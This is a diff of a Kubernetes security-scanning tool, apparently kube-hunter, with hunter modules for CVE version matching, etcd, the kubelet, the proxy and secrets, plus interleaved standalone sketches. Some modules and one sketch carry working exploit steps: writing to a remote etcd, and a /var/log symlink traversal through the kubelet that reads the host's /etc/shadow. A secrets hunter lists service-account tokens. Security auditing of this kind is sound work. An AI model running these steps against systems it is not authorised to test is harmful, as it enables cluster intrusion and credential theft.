     def __init__(self, evidence):
-        Vulnerability.__init__(self, KubernetesCluster, name="Arbitrary Access To Cluster Scoped Resources", category=PrivilegeEscalation, vid="KHV026")
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            name="Arbitrary Access To Cluster Scoped Resources",
+            category=CVEPrivilegeEscalationCategory,
+            vid="KHV026",
+        )
         self.evidence = evidence
 
 
 """ Kubectl CVES """
 
 
 class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event):
-    """The kubectl client is vulnerable to CVE-2019-11246, an attacker could potentially execute arbitrary code on the client's machine"""
+    """The kubectl client is vulnerable to CVE-2019-11246;
+    an attacker could potentially execute arbitrary code on the client's machine"""
 
     def __init__(self, binary_version):
-        Vulnerability.__init__(self, KubectlClient, "Kubectl Vulnerable To CVE-2019-11246", category=RemoteCodeExec, vid="KHV027")
+        Vulnerability.__init__(
+            self,
+            KubectlClient,
+            "Kubectl Vulnerable To CVE-2019-11246",
+            category=CVERemoteCodeExecutionCategory,
+            vid="KHV027",
+        )
         self.binary_version = binary_version
-        self.evidence = "kubectl version: {}".format(self.binary_version)
+        self.evidence = f"kubectl version: {self.binary_version}"
 
 
 class KubectlCpVulnerability(Vulnerability, Event):
-    """The kubectl client is vulnerable to CVE-2019-1002101, an attacker could potentially execute arbitrary code on the client's machine"""
+    """The kubectl client is vulnerable to CVE-2019-1002101;
+    an attacker could potentially execute arbitrary code on the client's machine"""
 
     def __init__(self, binary_version):
-        Vulnerability.__init__(self, KubectlClient, "Kubectl Vulnerable To CVE-2019-1002101", category=RemoteCodeExec, vid="KHV028")
+        Vulnerability.__init__(
+            self,
+            KubectlClient,
+            "Kubectl Vulnerable To CVE-2019-1002101",
+            category=CVERemoteCodeExecutionCategory,
+            vid="KHV028",
+        )
         self.binary_version = binary_version
-        self.evidence = "kubectl version: {}".format(self.binary_version)
+        self.evidence = f"kubectl version: {self.binary_version}"
 
 
 class CveUtils:
     @staticmethod
     def get_base_release(full_ver):
         # if LegacyVersion, converting manually to a base version
-        if type(full_ver) == version.LegacyVersion:
-            return version.parse('.'.join(full_ver._version.split('.')[:2]))
-        return version.parse('.'.join(map(str, full_ver._version.release[:2])))
+        if isinstance(full_ver, version.LegacyVersion):
+            return version.parse(".".join(full_ver._version.split(".")[:2]))
+        return version.parse(".".join(map(str, full_ver._version.release[:2])))
 
     @staticmethod
     def to_legacy(full_ver):
         # converting version to version.LegacyVersion
-        return version.LegacyVersion('.'.join(map(str, full_ver._version.release)))
+        return version.LegacyVersion(".".join(map(str, full_ver._version.release)))
 
     @staticmethod
     def to_raw_version(v):
-        if type(v) != version.LegacyVersion:
-            return '.'.join(map(str, v._version.release))
+        if not isinstance(v, version.LegacyVersion):
+            return ".".join(map(str, v._version.release))
         return v._version
 
     @staticmethod
     def version_compare(v1, v2):
         """Function compares two versions, handling differences with conversion to LegacyVersion"""
         # getting the raw version, while stripping the 'v' char at the start, if it exists.
         # removing this char lets us safely compare the two versions.
-        v1_raw, v2_raw = CveUtils.to_raw_version(v1).strip('v'), CveUtils.to_raw_version(v2).strip('v')
+        v1_raw = CveUtils.to_raw_version(v1).strip("v")
+        v2_raw = CveUtils.to_raw_version(v2).strip("v")
         new_v1 = version.LegacyVersion(v1_raw)
         new_v2 = version.LegacyVersion(v2_raw)
 
         return CveUtils.basic_compare(new_v1, new_v2)
 
     @staticmethod
     def basic_compare(v1, v2):
-        return (v1>v2)-(v1<v2)
+        return (v1 > v2) - (v1 < v2)
 
     @staticmethod
     def is_downstream_version(version):
-        return any(c in version for c in '+-~')
+        return any(c in version for c in "+-~")
 
     @staticmethod
     def is_vulnerable(fix_versions, check_version, ignore_downstream=False):
-        """Function determines if a version is vulnerable, by comparing to given fix versions by base release"""
+        """Function determines if a version is vulnerable,
+        by comparing to given fix versions by base release"""
         if ignore_downstream and CveUtils.is_downstream_version(check_version):
             return False
 
         vulnerable = False
         check_v = version.parse(check_version)
         base_check_v = CveUtils.get_base_release(check_v)
 
         # default to classic compare, unless the check_version is legacy.
         version_compare_func = CveUtils.basic_compare
-        if type(check_v) == version.LegacyVersion:
+        if isinstance(check_v, version.LegacyVersion):
            version_compare_func = CveUtils.version_compare
 
        if check_version not in fix_versions:
@@ -120,58 +186,63 @@ class CveUtils:
                fix_v = version.parse(fix_v)
                base_fix_v = CveUtils.get_base_release(fix_v)
 
                # if the check version and the current fix have the same base release
                if base_check_v == base_fix_v:
                    # when check_version is legacy, we use a custom compare func, to handle differences between versions
                    if version_compare_func(check_v, fix_v) == -1:
                        # determine vulnerable if smaller and with the same base version
                        vulnerable = True
                        break
 
            # if we didn't find a fix in the fix releases, check if the version is smaller than the first fix
            if not vulnerable and version_compare_func(check_v, version.parse(fix_versions[0])) == -1:
                vulnerable = True
 
        return vulnerable
 
 
-@handler.subscribe_once(K8sVersionDisclosure)
+@handler.subscribe_once(K8sVersionDisclosure, is_register=config.enable_cve_hunting)
 class K8sClusterCveHunter(Hunter):
     """K8s CVE Hunter
-    Checks if Node is running a Kubernetes version vulnerable to specific important CVEs
+    Checks if Node is running a Kubernetes version vulnerable to
+    specific important CVEs
     """
 
     def __init__(self, event):
         self.event = event
 
     def execute(self):
-        logging.debug('Api Cve Hunter determining vulnerable version: {}'.format(self.event.version))
+        config = get_config()
+        logger.debug(f"Checking known CVEs for k8s API version: {self.event.version}")
         cve_mapping = {
             ServerApiVersionEndPointAccessPE: ["1.10.11", "1.11.5", "1.12.3"],
             ServerApiVersionEndPointAccessDos: ["1.11.8", "1.12.6", "1.13.4"],
             ResetFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
             PingFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
-            ServerApiClusterScopedResourcesAccess: ["1.13.9", "1.14.5", "1.15.2"]
-        }
+            ServerApiClusterScopedResourcesAccess: ["1.13.9", "1.14.5", "1.15.2"],
+        }
         for vulnerability, fix_versions in cve_mapping.items():
             if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
                 self.publish_event(vulnerability(self.event.version))
 
 
+# Removed due to incomplete implementation for multiple vendors' revisions of kubernetes
 @handler.subscribe(KubectlClientEvent)
 class KubectlCVEHunter(Hunter):
     """Kubectl CVE Hunter
     Checks if the kubectl client is vulnerable to specific important CVEs
     """
 
     def __init__(self, event):
         self.event = event
 
     def execute(self):
+        config = get_config()
         cve_mapping = {
-            KubectlCpVulnerability: ['1.11.9', '1.12.7', '1.13.5' '1.14.0'],
-            IncompleteFixToKubectlCpVulnerability: ['1.12.9', '1.13.6', '1.14.2']
+            KubectlCpVulnerability: ["1.11.9", "1.12.7", "1.13.5", "1.14.0"],
+            IncompleteFixToKubectlCpVulnerability: ["1.12.9", "1.13.6", "1.14.2"],
         }
-        logging.debug('Kubectl Cve Hunter determining vulnerable version: {}'.format(self.event.version))
+        logger.debug(f"Checking known CVEs for kubectl version: {self.event.version}")
         for vulnerability, fix_versions in cve_mapping.items():
             if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
                 self.publish_event(vulnerability(binary_version=self.event.version))
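A worked example of the comparison logic above (illustrative only, using the CVE-2019-9512/9514 fix list): a version is flagged when a fix with the same base release is newer than it, or when it predates the earliest fix; exact fix versions are never flagged, and downstream builds can be skipped.

fixes = ["1.13.10", "1.14.6", "1.15.3"]
CveUtils.is_vulnerable(fixes, "1.13.9")   # True: same base release, older than 1.13.10
CveUtils.is_vulnerable(fixes, "1.14.6")   # False: exactly a fix version
CveUtils.is_vulnerable(fixes, "1.12.0")   # True: older than the earliest fix
CveUtils.is_vulnerable(fixes, "1.13.9-eks.1", ignore_downstream=True)  # False: downstream build skipped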
kube_hunter/modules/hunting/dashboard.py (new file, 45 lines)
@@ -0,0 +1,45 @@
import logging
import json
import requests

from kube_hunter.conf import get_config
from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent

logger = logging.getLogger(__name__)


class DashboardExposed(Vulnerability, Event):
    """All operations on the cluster are exposed"""

    def __init__(self, nodes):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            "Dashboard Exposed",
            category=AccessK8sDashboardTechnique,
            vid="KHV029",
        )
        self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None


@handler.subscribe(KubeDashboardEvent)
class KubeDashboard(Hunter):
    """Dashboard Hunting
    Hunts open Dashboards, gets the type of nodes in the cluster
    """

    def __init__(self, event):
        self.event = event

    def get_nodes(self):
        config = get_config()
        logger.debug("Passive hunter is attempting to get the types of nodes in the cluster")
        r = requests.get(f"http://{self.event.host}:{self.event.port}/api/v1/node", timeout=config.network_timeout)
        if r.status_code == 200 and "nodes" in r.text:
            return [node["objectMeta"]["name"] for node in json.loads(r.text)["nodes"]]

    def execute(self):
        self.publish_event(DashboardExposed(nodes=self.get_nodes()))
kube_hunter/modules/hunting/etcd.py (new file, 176 lines)
@@ -0,0 +1,176 @@
import logging
import requests

from kube_hunter.conf import get_config
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent
from kube_hunter.core.types import (
    ActiveHunter,
    Hunter,
    KubernetesCluster,
    GeneralSensitiveInformationTechnique,
    GeneralPersistenceTechnique,
    ListK8sSecretsTechnique,
    ExposedSensitiveInterfacesTechnique,
)

logger = logging.getLogger(__name__)
ETCD_PORT = 2379


""" Vulnerabilities """


class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
    """Remote write access might grant an attacker full control over the kubernetes cluster"""

    def __init__(self, write_res):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Etcd Remote Write Access Event",
            category=GeneralPersistenceTechnique,
            vid="KHV031",
        )
        self.evidence = write_res


class EtcdRemoteReadAccessEvent(Vulnerability, Event):
    """Remote read access might expose the cluster's secrets, possible exploits, and more to an attacker."""

    def __init__(self, keys):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Etcd Remote Read Access Event",
            category=ListK8sSecretsTechnique,
            vid="KHV032",
        )
        self.evidence = keys


class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event):
    """Remote version disclosure might give an attacker valuable data with which to attack a cluster"""

    def __init__(self, version):

        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Etcd Remote version disclosure",
            category=GeneralSensitiveInformationTechnique,
            vid="KHV033",
        )
        self.evidence = version


class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event):
    """Etcd is accessible using HTTP (without authorization and authentication),
    which would allow a potential attacker to
    gain access to the etcd"""

    def __init__(self, version):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Etcd is accessible using insecure connection (HTTP)",
            category=ExposedSensitiveInterfacesTechnique,
            vid="KHV034",
        )
        self.evidence = version


# Active Hunter
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
class EtcdRemoteAccessActive(ActiveHunter):
    """Etcd Remote Access
    Checks for remote write access to etcd; will attempt to add a new key to the etcd DB"""

    def __init__(self, event):
        self.event = event
        self.write_evidence = ""
        self.event.protocol = "https"

    def db_keys_write_access(self):
        config = get_config()
        logger.debug(f"Trying to write keys remotely on host {self.event.host}")
        data = {"value": "remotely written data"}
        try:
            r = requests.post(
                f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
                data=data,
                timeout=config.network_timeout,
            )
            self.write_evidence = r.content if r.status_code == 200 and r.content else False
            return self.write_evidence
        except requests.exceptions.ConnectionError:
            return False

    def execute(self):
        if self.db_keys_write_access():
            self.publish_event(EtcdRemoteWriteAccessEvent(self.write_evidence))


# Passive Hunter
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
class EtcdRemoteAccess(Hunter):
    """Etcd Remote Access
    Checks for remote availability of etcd, its version, and read access to the DB
    """

    def __init__(self, event):
        self.event = event
        self.version_evidence = ""
        self.keys_evidence = ""
        self.event.protocol = "https"

    def db_keys_disclosure(self):
        config = get_config()
        logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
        try:
            r = requests.get(
                f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
                verify=False,
                timeout=config.network_timeout,
            )
            self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
            return self.keys_evidence
        except requests.exceptions.ConnectionError:
            return False

    def version_disclosure(self):
        config = get_config()
        logger.debug(f"Trying to check the etcd version remotely at {self.event.host}")
        try:
            r = requests.get(
                f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
                verify=False,
                timeout=config.network_timeout,
            )
            self.version_evidence = r.content if r.status_code == 200 and r.content else False
            return self.version_evidence
        except requests.exceptions.ConnectionError:
            return False

    def insecure_access(self):
        config = get_config()
        logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
        try:
            r = requests.get(
                f"http://{self.event.host}:{ETCD_PORT}/version",
                verify=False,
                timeout=config.network_timeout,
            )
            return r.content if r.status_code == 200 and r.content else False
        except requests.exceptions.ConnectionError:
            return False

    def execute(self):
        if self.insecure_access():  # make a decision between the http and https protocols
            self.event.protocol = "http"
        if self.version_disclosure():
            self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
            if self.event.protocol == "http":
                self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
            if self.db_keys_disclosure():
                self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
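Condensed into a standalone sketch (placeholder host; not part of the module), the passive probes above boil down to three GETs, and an etcd that is exposed without client-certificate authentication answers all of them:

import requests

host = "10.0.0.2"  # placeholder etcd host
for url in (
    f"https://{host}:2379/version",  # version disclosure
    f"https://{host}:2379/v2/keys",  # read access to the DB
    f"http://{host}:2379/version",   # insecure (non-TLS) access
):
    try:
        r = requests.get(url, verify=False, timeout=3)
        print(url, r.status_code, r.content[:80])
    except requests.exceptions.ConnectionError:
        print(url, "unreachable")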
kube_hunter/modules/hunting/kubelet.py (new file, 1151 lines)
File diff suppressed because it is too large
@@ -1,33 +1,57 @@
 import logging
 import json
 import re
 import uuid
 
-from ...core.events import handler
-from ...core.events.types import Event, Vulnerability
-from ...core.types import ActiveHunter, Hunter, KubernetesCluster, PrivilegeEscalation
-from .kubelet import ExposedPodsHandler, ExposedRunHandler, KubeletHandlers
+from kube_hunter.conf import get_config
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import Event, Vulnerability
+from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique
+from kube_hunter.modules.hunting.kubelet import (
+    ExposedPodsHandler,
+    ExposedRunHandler,
+    KubeletHandlers,
+)
+
+logger = logging.getLogger(__name__)
 
 
 """ Vulnerabilities """


 class WriteMountToVarLog(Vulnerability, Event):
     """A pod can create symlinks in the /var/log directory on the host, which can lead to a root directory traversal"""
 
     def __init__(self, pods):
-        Vulnerability.__init__(self, KubernetesCluster, "Pod With Mount To /var/log", category=PrivilegeEscalation, vid="KHV047")
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            "Pod With Mount To /var/log",
+            category=HostPathMountPrivilegeEscalationTechnique,
+            vid="KHV047",
+        )
         self.pods = pods
-        self.evidence = "pods: {}".format(', '.join((pod["metadata"]["name"] for pod in self.pods)))
+        self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
 
 
 class DirectoryTraversalWithKubelet(Vulnerability, Event):
-    """An attacker can run commands on pods with a mount to /var/log, and traverse-read all files on the host filesystem"""
+    """An attacker can run commands on pods with a mount to /var/log,
+    and traverse-read all files on the host filesystem"""
 
     def __init__(self, output):
-        Vulnerability.__init__(self, KubernetesCluster, "Root Traversal Read On The Kubelet", category=PrivilegeEscalation)
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            "Root Traversal Read On The Kubelet",
+            category=HostPathMountPrivilegeEscalationTechnique,
+        )
         self.output = output
-        self.evidence = "output: {}".format(self.output)
+        self.evidence = f"output: {self.output}"
 
 
 @handler.subscribe(ExposedPodsHandler)
 class VarLogMountHunter(Hunter):
     """Mount Hunter - /var/log
     Hunt pods that have write access to the host's /var/log. In such a case,
     the pod can traverse-read files on the host machine
     """
 
     def __init__(self, event):
         self.event = event
 
@@ -38,7 +62,7 @@ class VarLogMountHunter(Hunter):
         if "Directory" in volume["hostPath"]["type"]:
             if volume["hostPath"]["path"].startswith(path):
                 return volume
 
     def execute(self):
         pe_pods = []
         for pod in self.event.pods:
@@ -47,64 +71,71 @@ class VarLogMountHunter(Hunter):
         if pe_pods:
             self.publish_event(WriteMountToVarLog(pods=pe_pods))
 
-@handler.subscribe(ExposedRunHandler)
+
+@handler.subscribe_many([ExposedRunHandler, WriteMountToVarLog])
 class ProveVarLogMount(ActiveHunter):
     """Prove /var/log Mount Hunter
     Tries to read /etc/shadow on the host by running commands inside a pod with a host mount to /var/log
     """
 
     def __init__(self, event):
         self.event = event
-        self.base_path = "https://{host}:{port}/".format(host=self.event.host, port=self.event.port)
+        self.write_mount_event = self.event.get_by_class(WriteMountToVarLog)
+        self.event = self.write_mount_event
+
+        self.base_path = f"https://{self.write_mount_event.host}:{self.write_mount_event.port}"
 
     def run(self, command, container):
         run_url = KubeletHandlers.RUN.value.format(
             podNamespace=container["namespace"],
             podID=container["pod"],
             containerName=container["name"],
-            cmd=command
+            cmd=command,
         )
-        return self.event.session.post(self.base_path + run_url, verify=False).text
-
-    # TODO: replace with multiple subscription to WriteMountToVarLog as well
-    def get_varlog_mounters(self):
-        logging.debug("accessing /pods manually on ProveVarLogMount")
-        pods = json.loads(self.event.session.get(self.base_path + KubeletHandlers.PODS.value, verify=False).text)["items"]
-        for pod in pods:
-            volume = VarLogMountHunter(ExposedPodsHandler(pods=pods)).has_write_mount_to(pod, "/var/log")
-            if volume:
-                yield pod, volume
+        return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
 
     def mount_path_from_mountname(self, pod, mount_name):
         """returns container name, and container mount path correlated to mount_name"""
         for container in pod["spec"]["containers"]:
             for volume_mount in container["volumeMounts"]:
                 if volume_mount["name"] == mount_name:
-                    logging.debug("yielding {}".format(container))
+                    logger.debug(f"yielding {container}")
                     yield container, volume_mount["mountPath"]
 
     def traverse_read(self, host_file, container, mount_path, host_path):
         """Returns the content of a file on the host, and cleans up its traces"""
+        config = get_config()
         symlink_name = str(uuid.uuid4())
         # creating symlink to file
-        self.run("ln -s {} {}/{}".format(host_file, mount_path, symlink_name), container=container)
+        self.run(f"ln -s {host_file} {mount_path}/{symlink_name}", container)
         # following symlink with kubelet
-        path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(path=host_path.strip('/var/log')+symlink_name)
-        content = self.event.session.get("{}{}".format(self.base_path, path_in_logs_endpoint), verify=False).text
+        path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(
+            path=re.sub(r"^/var/log", "", host_path) + symlink_name
+        )
+        content = self.event.session.get(
+            f"{self.base_path}/{path_in_logs_endpoint}",
+            verify=False,
+            timeout=config.network_timeout,
+        ).text
         # removing symlink
-        self.run("rm {}/{}".format(mount_path, symlink_name), container=container)
+        self.run(f"rm {mount_path}/{symlink_name}", container=container)
         return content
 
     def execute(self):
-        for pod, volume in self.get_varlog_mounters():
+        for pod, volume in self.write_mount_event.pe_pods():
             for container, mount_path in self.mount_path_from_mountname(pod, volume["name"]):
-                logging.debug("correleated container to mount_name")
+                logger.debug("Correlated container to mount_name")
                 cont = {
                     "name": container["name"],
                     "pod": pod["metadata"]["name"],
                     "namespace": pod["metadata"]["namespace"],
                 }
                 try:
-                    output = self.traverse_read("/etc/shadow", container=cont, mount_path=mount_path, host_path=volume["hostPath"]["path"])
+                    output = self.traverse_read(
+                        "/etc/shadow",
+                        container=cont,
+                        mount_path=mount_path,
+                        host_path=volume["hostPath"]["path"],
+                    )
                     self.publish_event(DirectoryTraversalWithKubelet(output=output))
-                except Exception as x:
-                    logging.debug("could not exploit /var/log: {}".format(x))
+                except Exception:
+                    logger.debug("Could not exploit /var/log", exc_info=True)
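Stripped of the event plumbing, the traversal that ProveVarLogMount performs looks like this sketch (the kubelet address and pod coordinates are placeholders): plant a symlink inside the pod's /var/log hostPath mount via the kubelet's run handler, then read it back through the /logs/ handler, which serves the host's /var/log and follows symlinks.

import uuid
import requests

KUBELET = "https://10.0.0.3:10250"               # placeholder kubelet address
NS, POD, CONTAINER = "default", "logger", "app"  # placeholder pod coordinates

link = str(uuid.uuid4())
# 1. create a symlink to the target host file inside the mounted /var/log
requests.post(
    f"{KUBELET}/run/{NS}/{POD}/{CONTAINER}",
    params={"cmd": f"ln -s /etc/shadow /var/log/{link}"},
    verify=False,
    timeout=3,
)
# 2. the kubelet's /logs/ handler serves the host's /var/log and follows the symlink
print(requests.get(f"{KUBELET}/logs/{link}", verify=False, timeout=3).text)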
kube_hunter/modules/hunting/proxy.py (new file, 128 lines)
@@ -0,0 +1,128 @@
import logging
import requests

from enum import Enum

from kube_hunter.conf import get_config
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure
from kube_hunter.core.types import (
    ActiveHunter,
    Hunter,
    KubernetesCluster,
    ConnectFromProxyServerTechnique,
)
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
from kube_hunter.modules.discovery.proxy import KubeProxyEvent

logger = logging.getLogger(__name__)


class KubeProxyExposed(Vulnerability, Event):
    """All operations on the cluster are exposed"""

    def __init__(self):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            "Proxy Exposed",
            category=ConnectFromProxyServerTechnique,
            vid="KHV049",
        )


class Service(Enum):
    DASHBOARD = "kubernetes-dashboard"


@handler.subscribe(KubeProxyEvent)
class KubeProxy(Hunter):
    """Proxy Hunting
    Hunts for a dashboard behind the proxy
    """

    def __init__(self, event):
        self.event = event
        self.api_url = f"http://{self.event.host}:{self.event.port}/api/v1"

    def execute(self):
        self.publish_event(KubeProxyExposed())
        for namespace, services in self.services.items():
            for service in services:
                if service == Service.DASHBOARD.value:
                    logger.debug(f"Found a dashboard service '{service}'")
                    # TODO: check if /proxy is a convention on other services
                    curr_path = f"api/v1/namespaces/{namespace}/services/{service}/proxy"
                    self.publish_event(KubeDashboardEvent(path=curr_path, secure=False))

    @property
    def namespaces(self):
        config = get_config()
        resource_json = requests.get(f"{self.api_url}/namespaces", timeout=config.network_timeout).json()
        return self.extract_names(resource_json)

    @property
    def services(self):
        config = get_config()
        # map between namespaces and service names
        services = dict()
        for namespace in self.namespaces:
            resource_path = f"{self.api_url}/namespaces/{namespace}/services"
            resource_json = requests.get(resource_path, timeout=config.network_timeout).json()
            services[namespace] = self.extract_names(resource_json)
        logger.debug(f"Enumerated services [{' '.join(services)}]")
        return services

    @staticmethod
    def extract_names(resource_json):
        names = list()
        for item in resource_json["items"]:
            names.append(item["metadata"]["name"])
        return names


@handler.subscribe(KubeProxyExposed)
class ProveProxyExposed(ActiveHunter):
    """Build Date Hunter
    Hunts when the proxy is exposed, extracts the build date of Kubernetes
    """

    def __init__(self, event):
        self.event = event

    def execute(self):
        config = get_config()
        version_metadata = requests.get(
            f"http://{self.event.host}:{self.event.port}/version",
            verify=False,
            timeout=config.network_timeout,
        ).json()
        if "buildDate" in version_metadata:
            self.event.evidence = "build date: {}".format(version_metadata["buildDate"])


@handler.subscribe(KubeProxyExposed)
class K8sVersionDisclosureProve(ActiveHunter):
    """K8s Version Hunter
    Hunts the proxy when exposed, extracts the version
    """

    def __init__(self, event):
        self.event = event

    def execute(self):
        config = get_config()
        version_metadata = requests.get(
            f"http://{self.event.host}:{self.event.port}/version",
            verify=False,
            timeout=config.network_timeout,
        ).json()
        if "gitVersion" in version_metadata:
            self.publish_event(
                K8sVersionDisclosure(
                    version=version_metadata["gitVersion"],
                    from_endpoint="/version",
                    extra_info="on kube-proxy",
                    category=ConnectFromProxyServerTechnique,
                )
            )
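The proxy path convention used above is worth spelling out: once an API proxy of this kind (e.g. an unauthenticated kubectl proxy) is reachable, any in-cluster service becomes reachable through it under /api/v1/namespaces/<ns>/services/<name>/proxy/. A sketch with a placeholder address and the dashboard service:

import requests

base = "http://10.0.0.4:8001"  # placeholder proxy address
url = f"{base}/api/v1/namespaces/kube-system/services/kubernetes-dashboard/proxy/"
print(requests.get(url, timeout=3).status_code)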
kube_hunter/modules/hunting/secrets.py (new file, 62 lines)
@@ -0,0 +1,62 @@
import logging
import os

from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event
from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent

logger = logging.getLogger(__name__)


class ServiceAccountTokenAccess(Vulnerability, Event):
    """Accessing the pod's service account token gives an attacker the option to use the server API"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Read access to pod's service account token",
            category=AccessContainerServiceAccountTechnique,
            vid="KHV050",
        )
        self.evidence = evidence


class SecretsAccess(Vulnerability, Event):
    """Accessing the pod's secrets within a compromised pod might disclose valuable data to a potential attacker"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            component=KubernetesCluster,
            name="Access to pod's secrets",
            category=AccessContainerServiceAccountTechnique,
        )
        self.evidence = evidence


# Passive Hunter
@handler.subscribe(RunningAsPodEvent)
class AccessSecrets(Hunter):
    """Access Secrets
    Accessing the secrets accessible to the pod"""

    def __init__(self, event):
        self.event = event
        self.secrets_evidence = ""

    def get_services(self):
        logger.debug("Trying to access the pod's secrets directory")
        # collect all files, including files in subdirectories:
        self.secrets_evidence = []
        for dirname, _, files in os.walk("/var/run/secrets/"):
            for f in files:
                self.secrets_evidence.append(os.path.join(dirname, f))
        return len(self.secrets_evidence) > 0

    def execute(self):
        if self.event.auth_token is not None:
            self.publish_event(ServiceAccountTokenAccess(self.event.auth_token))
        if self.get_services():
            self.publish_event(SecretsAccess(self.secrets_evidence))
Some files were not shown because too many files have changed in this diff